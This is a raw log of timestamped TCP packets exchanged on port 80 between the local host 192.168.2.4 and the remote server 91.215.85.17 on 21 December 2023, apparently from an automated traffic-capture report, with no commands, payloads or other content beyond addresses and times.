                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609764099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609776020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609786987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609811068 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609833002 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877396107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877409935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877423048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877440929 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877465010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877490044 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877505064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877551079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877568960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877584934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877598047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877616882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877631903 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877639055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877674103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877674103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877708912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877746105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877753019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877758980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877803087 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877804995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877824068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877835035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877856970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877880096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877909899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877935886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877939939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877953053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877980947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.877995014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878007889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878024101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878046989 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878060102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878071070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878102064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878154993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878185034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878197908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878243923 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878254890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878268957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878303051 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878307104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878319979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878357887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878384113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878431082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878458023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878470898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878474951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878511906 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878525019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878555059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878571033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878596067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878623009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878654003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878678083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878690958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878703117 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878736019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878740072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878757954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878774881 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878788948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878807068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878834009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878865957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878881931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878910065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878935099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878972054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878981113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.878993034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879023075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879025936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879098892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879117012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879134893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879142046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879168987 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879225969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879245043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879259109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879271030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879291058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879292965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879309893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879342079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879375935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879384995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879420996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879434109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879462004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879501104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879513979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879530907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879543066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879543066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879571915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879580021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879597902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879609108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879622936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879647017 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879657984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879671097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879702091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879714966 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879734039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879765987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879767895 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879838943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879853964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879868984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879887104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.879929066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146440983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146518946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146591902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146667957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146724939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146765947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146812916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.146929026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147036076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147098064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147145033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147191048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147269964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147377968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147423983 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147542953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147631884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147675037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147758007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147881031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147918940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.147991896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148058891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148097038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148160934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148739100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148777962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148818016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148897886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.148935080 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149015903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149147987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149185896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149229050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149305105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149343967 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149389982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149485111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149523020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149566889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149642944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.149681091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150266886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150443077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150479078 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150552988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150628090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.150665045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151376963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151575089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151622057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151683092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151763916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.151801109 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152009010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152358055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152396917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152513027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152654886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152694941 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152816057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.152971029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.153023958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.153039932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.153129101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.153171062 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.415875912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.456582069 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.460103035 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.460133076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.729053020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748100042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748114109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748172045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748172998 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748270035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748310089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748375893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748452902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748492002 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748522997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748611927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748652935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748692989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748788118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748825073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748888969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.748960972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749001026 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749023914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749105930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749145031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749193907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749270916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749314070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749341965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749418020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749460936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749505043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749615908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749654055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749720097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749789953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749831915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749860048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749934912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.749975920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750037909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750113964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750149965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750191927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750272036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750308990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750412941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750498056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750535965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750585079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750920057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750961065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.750989914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751049995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751091957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751125097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751276970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751317024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751351118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751447916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751487970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:28.751562119 CET804973891.215.85.17192.168.2.4
